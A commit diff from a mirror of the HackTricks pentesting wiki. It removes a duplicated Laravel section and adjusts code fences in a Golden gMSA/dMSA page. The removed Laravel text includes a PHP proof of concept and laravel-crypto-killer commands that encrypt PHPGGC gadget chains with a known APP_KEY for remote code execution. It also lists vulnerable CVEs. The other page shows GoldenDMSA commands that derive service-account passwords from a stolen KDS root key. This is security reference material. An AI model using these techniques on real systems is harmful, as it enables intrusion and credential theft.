maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

f

Browse Source
This commit is contained in:
carlospolop 2025-07-28 12:56:40 +02:00
parent 5887ddc8d8
commit 71b9eb4ca7
2 changed files with 6 additions and 102 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

96
src/network-services-pentesting/pentesting-web/laravel.md
View File

@ -83,16 +83,6 @@ Key findings of the research published by Synacktiv (2024-2025):
The private Go tool **nounours** pushes AES-CBC/GCM bruteforce throughput to ~1.5 billion tries/s, reducing full dataset cracking to <2 minutes.
---
## References
* [Laravel: APP_KEY leakage analysis](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
* [PHPGGC PHP Generic Gadget Chains](https://github.com/ambionics/phpggc)
* [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
## Laravel Tricks
@ -187,93 +177,7 @@ Or you can also exploit it with metasploit: `use unix/http/laravel_token_unseria
Another deserialization: [https://github.com/ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits)
### Laravel SQLInjection
Read information about this here: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
### Laravel SQLInjection
Read information about this here: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
---
## APP_KEY & Encryption internals (Laravel \u003e=5.6)
Laravel uses AES-256-CBC (or GCM) with HMAC integrity under the hood (`Illuminate\\Encryption\\Encrypter`).
The raw ciphertext that is finally **sent to the client** is **Base64 of a JSON object** like:
```json
{
"iv" : "Base64(random 16-byte IV)",
"value": "Base64(ciphertext)",
"mac" : "HMAC_SHA256(iv||value, APP_KEY)",
"tag" : "" // only used for AEAD ciphers (GCM)
}
```
`encrypt($value, $serialize=true)` will `serialize()` the plaintext by default, whereas
`decrypt($payload, $unserialize=true)` **will automatically `unserialize()`** the decrypted value.
Therefore **any attacker that knows the 32-byte secret `APP_KEY` can craft an encrypted PHP serialized object and gain RCE via magic methods (`__wakeup`, `__destruct`, …)**.
Minimal PoC (framework ≥9.x):
```php
use Illuminate\Support\Facades\Crypt;
$chain = base64_decode('<phpggc-payload>'); // e.g. phpggc Laravel/RCE13 system id -b -f
$evil = Crypt::encrypt($chain); // JSON->Base64 cipher ready to paste
```
Inject the produced string into any vulnerable `decrypt()` sink (route param, cookie, session, …).
---
## laravel-crypto-killer 🧨
[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) automates the whole process and adds a convenient **bruteforce** mode:
```bash
# Encrypt a phpggc chain with a known APP_KEY
laravel_crypto_killer.py encrypt -k "base64:<APP_KEY>" -v "$(phpggc Laravel/RCE13 system id -b -f)"
# Decrypt a captured cookie / token
laravel_crypto_killer.py decrypt -k <APP_KEY> -v <cipher>
# Try a word-list of keys against a token (offline)
laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt
```
The script transparently supports both CBC and GCM payloads and re-generates the HMAC/tag field.
---
## Real-world vulnerable patterns
| Project | Vulnerable sink | Gadget chain |
|---------|-----------------|--------------|
| Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}``decrypt($hash)` | Laravel/RCE13 |
| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN` cookie when `Passport::withCookieSerialization()` is enabled | Laravel/RCE9 |
| Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie``laravel_session` cookie | Laravel/RCE15 |
The exploitation workflow is always:
1. Obtain `APP_KEY` (default examples, Git leak, config/.env leak, or brute-force)
2. Generate gadget with **PHPGGC**
3. `laravel_crypto_killer.py encrypt …`
4. Deliver payload through the vulnerable parameter/cookie → **RCE**
---
## Mass APP_KEY discovery via cookie brute-force
Because every fresh Laravel response sets at least 1 encrypted cookie (`XSRF-TOKEN` and usually `laravel_session`), **public internet scanners (Shodan, Censys, …) leak millions of ciphertexts** that can be attacked offline.
Key findings of the research published by Synacktiv (2024-2025):
* Dataset July 2024 » 580 k tokens, **3.99 % keys cracked** (≈23 k)
* Dataset May 2025 » 625 k tokens, **3.56 % keys cracked**
* >1 000 servers still vulnerable to legacy CVE-2018-15133 because tokens directly contain serialized data.
* Huge key reuse the Top-10 APP_KEYs are hard-coded defaults shipped with commercial Laravel templates (UltimatePOS, Invoice Ninja, XPanel, …).
The private Go tool **nounours** pushes AES-CBC/GCM bruteforce throughput to ~1.5 billion tries/s, reducing full dataset cracking to <2 minutes.
---
## References
* [Laravel: APP_KEY leakage analysis](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)

12
src/windows-hardening/active-directory-methodology/golden-dmsa-gmsa.md
View File

@ -10,7 +10,7 @@ There are two major flavours:
1. **gMSA** group Managed Service Account can be used on multiple hosts that are authorised in its `msDS-GroupMSAMembership` attribute.
2. **dMSA** delegated Managed Service Account the (preview) successor to gMSA, relying on the same cryptography but allowing more granular delegation scenarios.
For both variants the **password is not stored** on each Domain Controller (DC) like a regular NT-hash. Instead every DC can **derive** the current password on-the-fly from:
For both variants the **password is not stored** on each Domain Controller (DC) like a regular NT-hash. Instead every DC can **derive** the current password on-the-fly from:
* The forest-wide **KDS Root Key** (`KRBTGT\KDS`) randomly generated GUID-named secret, replicated to every DC under the `CN=Master Root Keys,CN=Group Key Distribution Service, CN=Services, CN=Configuration, …` container.
* The target account **SID**.
@ -35,7 +35,7 @@ This is analogous to a *Golden Ticket* for service accounts.
3. .NET ≥ 4.7.2 x64 workstation to run [`GoldenDMSA`](https://github.com/Semperis/GoldenDMSA) or equivalent code.
### Golden gMSA / dMSA
##### Phase 1 Extract the KDS Root Key
#### Phase 1 Extract the KDS Root Key
Dump from any DC (Volume Shadow Copy / raw SAM+SECURITY hives or remote secrets):
@ -60,7 +60,7 @@ The base64 string labelled `RootKey` (GUID name) is required in later steps.
Retrieve at least `sAMAccountName`, `objectSid` and `msDS-ManagedPasswordId`:
```powershell
```bash
# Authenticated or anonymous depending on ACLs
Get-ADServiceAccount -Filter * -Properties msDS-ManagedPasswordId | \
Select sAMAccountName,objectSid,msDS-ManagedPasswordId
@ -70,7 +70,7 @@ GoldenGMSA.exe gmsainfo
[`GoldenDMSA`](https://github.com/Semperis/GoldenDMSA) implements helper modes:
```powershell
```bash
# LDAP enumeration (kerberos / simple bind)
GoldendMSA.exe info -d example.local -m ldap
@ -88,7 +88,7 @@ Because the GUID is 128-bit, naive bruteforce is infeasible, but:
Therefore a **narrow wordlist per account** (± few hours) is realistic.
```powershell
```bash
GoldendMSA.exe wordlist -s <SID> -d example.local -f example.local -k <KDSKeyGUID>
```
The tool computes candidate passwords and compares their base64 blob against the real `msDS-ManagedPassword` attribute the match reveals the correct GUID.
@ -97,7 +97,7 @@ The tool computes candidate passwords and compares their base64 blob against the
Once the ManagedPasswordID is known, the valid password is one command away:
```powershell
```bash
# derive base64 password
GoldendMSA.exe compute -s <SID> -k <KDSRootKey> -d example.local -m <ManagedPasswordID> -i <KDSRootKey ID>
GoldenGMSA.exe compute --sid <SID> --kdskey <KDSRootKey> --pwdid <ManagedPasswordID>